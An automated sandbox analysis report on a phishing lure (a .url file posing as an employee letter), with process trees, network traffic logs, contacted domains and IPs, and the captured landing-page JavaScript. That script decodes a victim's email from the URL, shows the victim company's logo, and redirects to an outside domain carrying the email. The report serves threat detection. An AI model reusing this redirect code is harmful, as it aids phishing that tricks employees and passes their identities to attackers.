Edit tour

Windows Analysis Report
Employee_Letter.PDFuJPefyDW1j.url

Overview

General Information

Sample name:	Employee_Letter.PDFuJPefyDW1j.url
Analysis ID:	1578501
MD5:	f58499b1114a28df07b9ad0b4f786b8d
SHA1:	b56fe6598f3761afe8410958af1c682e0a6bc676
SHA256:	004fe84cbb9c83b2fa4bf16120fb03b0b243e7737007187a0efc21f0639fcb29
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected suspicious Javascript

Javascript uses Clearbit API to dynamically determine company logos

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ== MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2056,i,12037651299568785254,16993497860421757936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://canseguros.com.br/homecoming/index#a2FyZW4... The script demonstrates several high-risk behaviors, including decoding a base64-encoded email parameter from the URL hash, extracting the domain, and then redirecting the user to a suspicious domain after a 5-second delay. This behavior is consistent with a phishing or malicious script that may be attempting to steal user information or redirect users to a malicious site.

Javascript uses Clearbit API to dynamically determine company logos

Source: https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==

HTTP Parser: // get the base64 encoded email parameter from the url hash var emailencoded = window.location.hash.substring(1); // remove the first character '#' // decode the base64 encoded email function decodebase64(encodedstr) { try { return atob(encodedstr); } catch (e) { console.error('invalid base64 string'); return ''; } } // decode the email var email = decodebase64(emailencoded); // extract domain from the email var domain = email.split('@')[1]; if (domain) { var logourl = `https://logo.clearbit.com/${domain}`; var logoelement = document.getelementbyid('domain-logo'); logoelement.src = logourl; logoelement.onerror = function() { logoelement.style.display = 'none'; // hide image if it fails to load }; } // wait for 3 ...

Source: https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==	HTTP Parser: No favicon
Source: https://hmv.vomivane.ru/2b8wjV/#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49990 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 13.227.8.64 13.227.8.64
Source: Joe Sandbox View	IP Address: 13.227.8.47 13.227.8.47

Source: Joe Sandbox View

ASN Name: OIS1US OIS1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.177.147
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.118.190

Source: global traffic	HTTP traffic detected: GET /homecoming/index HTTP/1.1Host: canseguros.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /enablecomp.com HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canseguros.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: canseguros.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://canseguros.com.br/homecoming/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /enablecomp.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: canseguros.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /2b8wjV/ HTTP/1.1Host: hmv.vomivane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://canseguros.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: hmv.vomivane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hmv.vomivane.ru/2b8wjV/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: canseguros.com.br
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: hmv.vomivane.ru
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com

Source: unknown

HTTP traffic detected: POST /report/v4?s=puUolmVyCiZjFMkAtFEacB%2BFLJgIc%2BaHFF0iQYk7WKB%2FW8UrkxrSFS0%2F3L%2BTibHrFqOvVG3e846id%2BA4CVeJtDpeq6YDmAu3Hi2mpGE2j2Sg%2BBGu2jdMiTNVGortkaNmxEM%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 419Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 19:20:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 80851Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ty4JtuEq9zH3JnwYhtqmx5PhAv%2B%2FaN4BSTi3NvDrv57vmYCGoVFKAwxSqb7XeHBQ2oiR1q43nEaQ7Rv8F%2B96jFwbTvoO%2BmVPG01I3m1hVfdT9dBJ049Xskca1MeHQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=1820&rtt_var=881&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1465&delivery_rate=1479692&cwnd=252&unsent_bytes=0&cid=e6bdf8cac38c4b5f&ts=46&x=0"CF-Cache-Status: STALEServer: cloudflareCF-RAY: 8f49c043397e7d20-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1860&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1171&delivery_rate=1559829&cwnd=207&unsent_bytes=0&cid=a6d91c242630e7b1&ts=6963&x=0"

Source: Employee_Letter.PDFuJPefyDW1j.url	String found in binary or memory: https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==
Source: chromecache_41.3.dr	String found in binary or memory: https://hMV.vomivane.ru/2b8wjV/#
Source: chromecache_41.3.dr	String found in binary or memory: https://logo.clearbit.com/$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49990 version: TLS 1.2

Source: classification engine

Classification label: mal48.phis.winURL@15/5@14/11

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2056,i,12037651299568785254,16993497860421757936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2056,i,12037651299568785254,16993497860421757936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Name	IP	Active	Malicious	Reputation
canseguros.com.br	162.241.2.141	true	true	unknown
d26p066pn2w0s0.cloudfront.net	13.227.8.47	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
hmv.vomivane.ru	172.67.134.25	true	false	unknown
www.google.com	142.250.181.132	true	false	high
logo.clearbit.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://a.nel.cloudflare.com/report/v4?s=puUolmVyCiZjFMkAtFEacB%2BFLJgIc%2BaHFF0iQYk7WKB%2FW8UrkxrSFS0%2F3L%2BTibHrFqOvVG3e846id%2BA4CVeJtDpeq6YDmAu3Hi2mpGE2j2Sg%2BBGu2jdMiTNVGortkaNmxEM%3D	false	high
https://canseguros.com.br/favicon.ico	false	unknown
https://hmv.vomivane.ru/2b8wjV/	false	unknown
https://hmv.vomivane.ru/favicon.ico	false	unknown
https://a.nel.cloudflare.com/report/v4?s=Ty4JtuEq9zH3JnwYhtqmx5PhAv%2B%2FaN4BSTi3NvDrv57vmYCGoVFKAwxSqb7XeHBQ2oiR1q43nEaQ7Rv8F%2B96jFwbTvoO%2BmVPG01I3m1hVfdT9dBJ049Xskca1MeHQA%3D%3D	false	high
https://logo.clearbit.com/enablecomp.com	false	high
https://hmv.vomivane.ru/2b8wjV/#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==	false	unknown
https://canseguros.com.br/homecoming/index	true	unknown
https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ==	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://hMV.vomivane.ru/2b8wjV/#	chromecache_41.3.dr	false		unknown
https://logo.clearbit.com/$	chromecache_41.3.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.134.25	hmv.vomivane.ru	United States	13335	CLOUDFLARENETUS	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
13.227.8.64	unknown	United States	16509	AMAZON-02US	false
162.241.2.141	canseguros.com.br	United States	26337	OIS1US	true
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
13.227.8.47	d26p066pn2w0s0.cloudfront.net	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.8
192.168.2.16
192.168.2.7
192.168.2.6

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578501
Start date and time:	2024-12-19 20:19:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Employee_Letter.PDFuJPefyDW1j.url
Detection:	MAL
Classification:	mal48.phis.winURL@15/5@14/11
Cookbook Comments:	Found application associated with file extension: .url

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.99, 64.233.162.84, 172.217.19.206, 172.217.17.46, 192.229.221.95, 217.20.58.98, 142.250.181.142, 172.217.17.35, 142.250.181.46, 23.50.252.137, 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: Employee_Letter.PDFuJPefyDW1j.url

Input	Output
URL: https://canseguros.com.br/homecoming/index#a2FyZW4... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "The script demonstrates several high-risk behaviors, including decoding a base64-encoded email parameter from the URL hash, extracting the domain, and then redirecting the user to a suspicious domain after a 5-second delay. This behavior is consistent with a phishing or malicious script that may be attempting to steal user information or redirect users to a malicious site." }
// Get the base64 encoded email parameter from the URL hash var emailEncoded = window.location.hash.substring(1); // Remove the first character '#' // Decode the base64 encoded email function decodeBase64(encodedStr) { try { return atob(encodedStr); } catch (e) { console.error('Invalid Base64 string'); return ''; } } // Decode the email var email = decodeBase64(emailEncoded); // Extract domain from the email var domain = email.split('@')[1]; if (domain) { var logoUrl = `https://logo.clearbit.com/${domain}`; var logoElement = document.getElementById('domain-logo'); logoElement.src = logoUrl; logoElement.onerror = function() { logoElement.style.display = 'none'; // Hide image if it fails to load }; } // Wait for 3 seconds before redirecting setTimeout(function() { window.location.href = "https://hMV.vomivane.ru/2b8wjV/#" + emailEncoded; }, 5000); // 5000 milliseconds = 5 seconds
URL: https://canseguros.com.br/homecoming/index#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ== Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Verifying your connection...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://canseguros.com.br Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://canseguros.com.br
URL: https://hmv.vomivane.ru/2b8wjV/#a2FyZW4uZ29sb3ZlcnNpY0BlbmFibGVjb21wLmNvbQ== Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

